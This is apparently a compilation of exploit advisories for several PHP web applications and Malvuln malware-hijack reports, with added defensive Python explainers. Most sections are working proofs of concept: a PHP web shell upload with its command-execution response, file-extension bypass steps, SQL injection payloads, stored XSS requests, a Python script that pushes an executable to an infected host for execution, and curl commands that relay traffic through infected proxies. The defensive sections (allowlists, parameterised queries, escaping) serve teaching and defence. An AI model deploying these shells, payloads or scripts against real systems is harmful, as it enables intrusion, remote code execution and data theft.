<pre><code># Exploit Title: Landa Driving School Management System Arbitrary File Upload<br /># Version: 2.0.1<br /># Google Dork: N/A<br /># Date: 17/01/2022<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151<br /># Software Link 2: https://simcycreative.com/landa/<br /># Software Demo: https://landa.simcycreative.com/<br /># Category: webapps<br /><br />Landa Driving School Management System 2.0.1 contains an arbitrary file upload vulnerability.<br />Any registered user can upload .php5 files through the attachments section of their profile: intercept the upload request (for example with Burp Suite's Proxy) and change the filename extension in the raw multipart body before forwarding it. The server stores the file and returns a direct link to it; where the web server maps .php5 to the PHP handler, the uploaded file runs as PHP and the user has remote code execution.<br /><br />Details:<br /><br />POST /profile/attachment/upload/ HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048<br />Content-Length: 294983<br />Origin: https://localhost<br />Connection: close<br />Referer: https://localhost/profile/91/<br />Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="name"<br /><br />sddd<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="csrf-token"<br /><br />e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="userid"<br /><br />91<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5 (leave Content-Type as image/png)<br />Content-Type: image/png<br /><br /><br />The response contains a direct link to the uploaded file.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/ee8990b5d076a7ed601a30eb677cc9be.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Email-Worm.Win32.Plexus.b<br />Vulnerability: Unauthenticated Remote Code Execution<br />Description: The malware listens on TCP ports 1250 (file write port) and 47435 (random FTP port). Third-party attackers who can reach infected systems can use a socket program to write binary data to the remote host. The malware writes that data to a file named "_up.exe" under "\Users\Victim\AppData\Local\Temp" and executes it immediately.<br /><br />Exploitation requires a few things for our code to run successfully, as there seems to be a file size limitation and header issues.<br /><br />1) Create a very small executable using masm32 in assembly.<br />2) Pack it using FSG13.<br />3) Prefix the payload with a DOS "MZ" header and an "ETX" control char (hex "\x03") followed by two NULL bytes, as the malware doesn't write the MZ header correctly.<br />4) Use Python to read in the EXE payload and push it to the infected host.<br /><br />Type: PE32<br />MD5: ee8990b5d076a7ed601a30eb677cc9be<br />Vuln ID: MVID-2021-0400<br />Disclosure: 11/07/2021<br /><br /><br />Exploit/PoC:<br />1) "DOOM.asm" compiled with masm32.<br /><br />include \masm32\include\masm32rt.inc<br />.data<br />HATE db "Masm32:", 0<br />MyReal8 REAL8 123.456<br />.data?<br />aDword dd ?<br />.code<br />start:<br /> invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK<br /> mov eax, 123<br /> exit<br />end start<br /><br /><br />2) Pack DOOM.exe using FSG13.<br /><br /><br />3) Connect to the infected system and push our own PE file (Python 3).<br /><br /># -*- coding: utf-8 -*-<br />from socket import socket, AF_INET, SOCK_STREAM<br /><br />MALWARE_HOST = "x.x.x.x"<br />PORT = 1250                      # Plexus.b file write port<br />DOOM = "DOOM_FSG.exe"            # FSG-packed payload built in steps 1 and 2<br /># The malware does not write the MZ header correctly, so the payload is prefixed with it.<br />EXE = b"MZ\x00\x03\x00\x00"<br /><br />def doit():<br />    with open(DOOM, "rb") as f:<br />        payload = EXE + f.read()<br />    s = socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br />    s.sendall(payload)           # written to %TEMP%\_up.exe on the infected host and executed<br />    s.close()<br />    print("MD5: ee8990b5d076a7ed601a30eb677cc9be")<br />    print("By Malvuln")<br /><br />if __name__ == "__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)<br /># Date: 18/01/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Exploit : <br /> <br />You can upload a php shell file as a bot_avatar or user_avatar or image<br /><br /># ------------------------------------------------------------------------------------------<br /># POC<br /># ------------------------------------------------------------------------------------------<br /><br /># Request sent as base user<br /><br />POST /classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost.SA<br />Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474<br />Content-Length: 1121<br />Connection: close<br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="name"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="short_name"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="intro"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="no_result"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: 
image/jpeg<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />if($_REQUEST['s']) {<br /> system($_REQUEST['s']);<br /> } else phpinfo();<br />?><br /></pre><br /></body><br /></html><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="user_avatar"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------55217074722533208072616276474--<br /><br /><br /># Response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 18 Jan 2022 00:51:29 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12<br />X-Powered-By: PHP/8.0.12<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 119<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br /># ------------------------------------------------------------------------------------------<br /># Request to webshell<br /># ------------------------------------------------------------------------------------------<br /><br />GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1<br />Host: localhost.SA<br />Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Connection: close<br /><br /># ------------------------------------------------------------------------------------------<br /># Webshell response<br /># ------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 18 Jan 2022 00:51:29 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12<br />X-Powered-By: PHP/8.0.12<br />Content-Length: 16<br 
/>Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><pre>0xSaudi<br /></pre><br /></code></pre>
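<p>Both upload PoCs above (the Landa .php5 attachment and the Simple Chatbot bot_avatar.php) get past the same kind of server-side check: a denylist of extensions, or no check at all, with the client-supplied filename reused on disk. The Python below is an added illustration, not code from either application. It puts a denylist check next to an allowlist check that also sniffs the file's leading bytes and chooses the stored name itself. The PNG/JPEG signatures, the PHP body and the filenames are constructed test data.</p>

```python
import os
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"

# Constructed sample uploads: filename as sent by the client -> first bytes of the body.
# The first three filenames mirror the two PoCs above; the bodies are made up here.
PHP_SHELL = b"<?php system($_REQUEST['s']); ?>"
SAMPLE_UPLOADS = {
    "w.php5": PHP_SHELL,             # Landa: extension not on the denylist
    "bot_avatar.php": PHP_SHELL,     # Simple Chatbot: no check at all
    "w.php.png": PHP_SHELL,          # double extension: looks like PNG, contains PHP
    "avatar.png": PNG_MAGIC + b"\x00" * 16,
}

# --- Weak check: deny a few "known bad" extensions, keep the client's filename. ---
DENYLIST = {".php", ".phtml"}

def denylist_accepts(filename):
    """Exact-match denylist: .php5, .phar, .PHP ... all slip through."""
    ext = os.path.splitext(filename)[1]
    return ext not in DENYLIST

# --- Hardened check: allowlist, content sniffing, server-chosen filename. ---
ALLOWED = {".png": PNG_MAGIC, ".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC}

def hardened_accepts(filename, head):
    """Return (accepted, stored_name).

    * only the last extension counts and it must be on the allowlist
    * the leading bytes of the body must carry that type's signature,
      so a PHP body behind a .png name is rejected
    * the stored name is random and server-chosen; the client's name and the
      client's Content-Type header never reach the filesystem
    """
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not head.startswith(magic):
        return False, None
    return True, secrets.token_hex(16) + ext

def compare(uploads=SAMPLE_UPLOADS):
    """Run both checks over the samples: filename -> (denylist verdict, hardened verdict)."""
    return {name: (denylist_accepts(name), hardened_accepts(name, head)[0])
            for name, head in uploads.items()}

if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:16} denylist={weak!s:5} hardened={strong}")
```

Even with both name and content checked, store uploads outside the document root or in a directory where the web server does not execute scripts; the handler mapping is what turns an accepted upload into code execution.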
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/e2d249f86890d290bb8af599ea0367f3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.SkynetRef.y<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 3128. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: e2d249f86890d290bb8af599ea0367f3<br />Vuln ID: MVID-2021-0399<br />Dropped files: wusa32.exe<br />Disclosure: 11/07/2021<br /><br />Exploit/PoC:<br />curl socks4://INFECTED_HOST:3128 http://VICTIM:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi<br /># Date: 18/01/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /># Steps<br /># Go to : http://127.0.0.1/classes/Master.php?f=get_response<br /># Save request in BurpSuite<br /># Run saved request with sqlmap -r sql.txt<br /><br />======<br /><br />POST /classes/Master.php?f=get_response HTTP/1.1<br />Host: 127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 73<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36<br />Connection: Keep-alive<br /><br />message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud<br /><br />======<br /><br />#Payloads<br /><br />#Payload (UNION query)<br />message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -<br /><br />#(AND/OR time-based blind)<br />message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud<br /><br /></code></pre>
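<p>The payloads above are sqlmap's. The ' AND ... AND 'Saud'='Saud shape closes the string literal the application builds around the message and reopens it at the end, and the 0x... literals in the UNION payload are sqlmap's hex-encoded marker strings (MySQL decodes them) bracketing the extracted value. The Python below is an added illustration, not the chatbot's code: it rebuilds the vulnerable string-concatenated query against an in-memory SQLite table (schema and rows constructed), shows the UNION and boolean variants of the injection working against it and failing against the parameterised version, and decodes the sqlmap markers. SQLite has no SLEEP(), so the time-based payload from the page is replaced by the boolean 1=1 / 1=2 pair, which infers the same thing from the response body instead of from the delay.</p>

```python
import re
import sqlite3

# Constructed stand-in for the chatbot's database; the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE responses (message TEXT, response TEXT);
        INSERT INTO responses VALUES ('hello', 'Hi there!');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db

def get_response_vulnerable(db, message):
    """String concatenation: the quote in `message` ends the literal and the rest is SQL."""
    sql = "SELECT response FROM responses WHERE message = '%s'" % message
    return [row[0] for row in db.execute(sql)]

def get_response_safe(db, message):
    """Bound parameter: `message` is always a value, never part of the statement."""
    sql = "SELECT response FROM responses WHERE message = ?"
    return [row[0] for row in db.execute(sql, (message,))]

# Injection strings in the shape sqlmap used above (the UNION one trimmed to one
# column, because the constructed query selects a single column).
BOOLEAN_TRUE = "hello' AND 1=1 AND 'Saud'='Saud"
BOOLEAN_FALSE = "hello' AND 1=2 AND 'Saud'='Saud"
UNION_DUMP = "-8150' UNION ALL SELECT password FROM users-- -"

# The UNION payload from the advisory, verbatim, for marker decoding.
SQLMAP_UNION_PAYLOAD = (
    "-8150' UNION ALL SELECT CONCAT(0x717a766b71,"
    "0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,"
    "0x716a7a7171),NULL-- -"
)

def decode_hex_literals(payload):
    """Decode MySQL 0x... literals; sqlmap's fixed start/end markers identify its traffic."""
    return [bytes.fromhex(h).decode("ascii") for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]

def demo():
    """Run every payload through both query builders; returns {label: (vulnerable, safe)}."""
    db = make_db()
    out = {}
    for label, payload in [("true", BOOLEAN_TRUE), ("false", BOOLEAN_FALSE), ("union", UNION_DUMP)]:
        out[label] = (get_response_vulnerable(db, payload), get_response_safe(db, payload))
    return out

if __name__ == "__main__":
    print(demo())
    print(decode_hex_literals(SQLMAP_UNION_PAYLOAD))
```

The decoded first and last markers (qzvkq and qjzqq) are the strings sqlmap later searches for in the response to cut out the extracted value; seeing a CONCAT of three hex literals with a random 40-character middle string in web logs is a reliable sign of a sqlmap UNION run.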
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/339ec4617eababfd46006f2219e68cb8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.SkynetRef.x<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 3128. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: 339ec4617eababfd46006f2219e68cb8<br />Vuln ID: MVID-2021-0398<br />Dropped files: wusa32.exe<br />Disclosure: 11/07/2021<br /><br />Exploit/PoC:<br />curl socks4://INFECTED_HOST:3128 http://VICTIM:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
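<p>The two SkynetRef advisories above (.y and .x) show the relay with curl. The Python below is an added example, not Malvuln's code, that performs the same SOCKS4 CONNECT by hand so the exchange is visible: the 9-byte request, the 8-byte reply whose CD field (0x5A granted, 0x5B to 0x5D rejected) is what a port scan through the proxy keys on, and the destination's banner read back through the tunnel. Nothing here should touch a real infected host, so the block also starts a constructed in-process SOCKS4 server that grants every CONNECT and plays back the FTP banner from the PoC; the host, port and banner values are test data. Note that curl's socks4:// scheme resolves VICTIM locally and sends its IPv4 address, which is what this code does too; socks4a:// would hand the hostname to the proxy instead.</p>

```python
import socket
import struct
import threading

SOCKS4_VERSION = 0x04
SOCKS4_CONNECT = 0x01
SOCKS4_GRANTED = 0x5A
SOCKS4_REJECTED = 0x5B

def build_socks4_connect(dst_ip, dst_port, userid=b""):
    """Client -> proxy: VN=4, CD=1, DSTPORT (2 bytes), DSTIP (4 bytes), USERID, NUL."""
    return (struct.pack("!BBH", SOCKS4_VERSION, SOCKS4_CONNECT, dst_port)
            + socket.inet_aton(dst_ip) + userid + b"\x00")

def parse_socks4_reply(data):
    """Proxy -> client: VN=0, CD, DSTPORT, DSTIP (8 bytes). True if CD says granted."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, _port = struct.unpack("!BBH", data[:4])
    if vn != 0:
        raise ValueError("not a SOCKS4 reply")
    return cd == SOCKS4_GRANTED

def recv_exact(sock, n):
    """Read exactly n bytes (fewer only if the peer closes first)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf

def probe_open_proxy(proxy_host, proxy_port, dst_ip, dst_port, timeout=5.0):
    """Ask the proxy to CONNECT to dst; return (granted, first bytes from the destination).

    A granted CONNECT for an unauthenticated client is the open-proxy finding; granted
    versus rejected per destination port is how the relay doubles as a port scanner.
    """
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_socks4_connect(dst_ip, dst_port))
        granted = parse_socks4_reply(recv_exact(s, 8))
        banner = s.recv(1024) if granted else b""
    return granted, banner

# --- Constructed stand-in for the infected host: grants everything, plays a banner. ---
FAKE_BANNER = b"220 INetSim FTP Service ready.\r\n"

def start_fake_socks4_proxy():
    """Serve one connection on 127.0.0.1 in a background thread; return the listening port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            hdr = recv_exact(conn, 8)
            b = conn.recv(1)                       # skip USERID up to its NUL terminator
            while b and b != b"\x00":
                b = conn.recv(1)
            _vn, cd, port = struct.unpack("!BBH", hdr[:4])
            code = SOCKS4_GRANTED if cd == SOCKS4_CONNECT else SOCKS4_REJECTED
            conn.sendall(struct.pack("!BBH", 0, code, port) + hdr[4:8])
            if code == SOCKS4_GRANTED:
                conn.sendall(FAKE_BANNER)          # what the destination would have sent
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    port = start_fake_socks4_proxy()
    print(probe_open_proxy("127.0.0.1", port, "10.0.0.5", 21))
```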
<pre><code># Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)<br /># Google Dork: inurl:"winlib.aspx"<br /># Date: 01/18/2021<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: http://www.wecul.pt/<br /># Software Link: http://www.wecul.pt/solucoes/bibliotecas/<br /># Version: < 1.0<br /># Tested on: Windows<br /><br /># 1. Description<br /><br />An unauthenticated user can exploit a SQL injection vulnerability in the thes1 parameter of winlibsrch.aspx.<br /><br /><br /># 2. Proof of Concept (PoC)<br /><br />https://vulnerable_website.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"><br /><br /><br /># 3. Research:<br />https://miguelsantareno.github.io/edp.pdf<br /></code></pre>
<pre><code># Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Sentinal920<br /># Date: 5-11-2021<br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># Vulnerable pages: client, invoice<br /># Vulnerable Parameters: "lastname", "remarks"<br /><br />Technical description:<br />A stored cross-site scripting vulnerability exists in Simple Client Management System 1.0. The "lastname" field of a client record and the "remarks" field of an invoice are saved without sanitisation and rendered without output encoding, so JavaScript supplied by an attacker runs in the browser of every user who later views the affected client or invoice, which can lead to session cookie theft, defacement and more.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/cms/admin/?page=client<br />2) Click on "Add New Client"<br />3) Insert the payload in the "lastname" field (or, for the invoice variant, in the "remarks" field of a new invoice)<br />4) Click Save<br /><br />Proof of concept (PoC):<br />The following payload runs the JavaScript when the stored record is displayed:<br /><script>alert(1)</script><br /><br /><br /><br />1) XSS POC in Add New Client<br />-----------------------------<br /><br />POST /cms/classes/Master.php?f=save_client HTTP/1.1<br />Host: localhost<br />Content-Length: 1026<br />sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=client/manage_client<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn<br />Connection: close<br /><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="lastname"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="firstname"<br /><br />anything<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="middlename"<br /><br />anything<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="dob"<br /><br />2021-11-03<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="contact"<br /><br />xxxxxxxxxx<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="address"<br /><br />xxxxxx<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="email"<br /><br />xxxx@xxx.com<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="avatar"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--<br /><br /><br /><br />2) XSS POC in Add New Invoice<br />-----------------------------<br /><br />POST /cms/classes/Master.php?f=save_invoice HTTP/1.1<br />Host: localhost<br />Content-Length: 1032<br />sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=invoice/manage_invoice<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn<br />Connection: close<br /><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="client_id"<br /><br />1<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="service_id[]"<br /><br />1<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="price[]"<br /><br />250<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="discount_perc"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="discount"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="tax_perc"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="tax"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="total_amount"<br /><br />250<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="remarks"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo--<br /></code></pre>
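<p>The PoCs above store the script payload through Master.php and it fires when the client or invoice list is rendered: the database is doing its job, the HTML rendering is not. The Python below is an added illustration, not the application's code. It uses an in-memory SQLite client table (constructed), the same kind of parameterised insert that stores the payload harmlessly, and two renderers: one interpolating the stored value into HTML as-is and one escaping it for the context it lands in. It also covers the attribute context, which needs quote escaping that a bare angle-bracket filter would miss; the attribute payload is constructed, not from the page.</p>

```python
import html
import sqlite3

PAYLOAD = "<script>alert(1)</script>"          # the payload from the PoC
ATTR_PAYLOAD = 'x" onmouseover="alert(1)'    # constructed: breaks out of a value="" attribute

# Constructed stand-in for the clients table; the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT)")
    return db

def save_client(db, firstname, lastname):
    """Parameterised insert: storing the payload is fine, it is just a string."""
    db.execute("INSERT INTO clients (firstname, lastname) VALUES (?, ?)", (firstname, lastname))
    db.commit()

def render_clients_unsafe(db):
    """Stored XSS: the value is pasted into the markup and the browser parses it as HTML."""
    rows = db.execute("SELECT id, firstname, lastname FROM clients").fetchall()
    return "".join(
        f'<tr><td>{fn} {ln}</td><td><input name="lastname" value="{ln}"></td></tr>'
        for _id, fn, ln in rows
    )

def render_clients_safe(db):
    """Escape at output time for the context: text node and double-quoted attribute."""
    rows = db.execute("SELECT id, firstname, lastname FROM clients").fetchall()
    return "".join(
        '<tr><td>{} {}</td><td><input name="lastname" value="{}"></td></tr>'.format(
            html.escape(fn), html.escape(ln), html.escape(ln, quote=True))
        for _id, fn, ln in rows
    )

def demo():
    """Store both payloads, render both ways; returns (unsafe_html, safe_html)."""
    db = make_db()
    save_client(db, "anything", PAYLOAD)
    save_client(db, "anything", ATTR_PAYLOAD)
    return render_clients_unsafe(db), render_clients_safe(db)

if __name__ == "__main__":
    unsafe, safe = demo()
    print(unsafe)
    print(safe)
```

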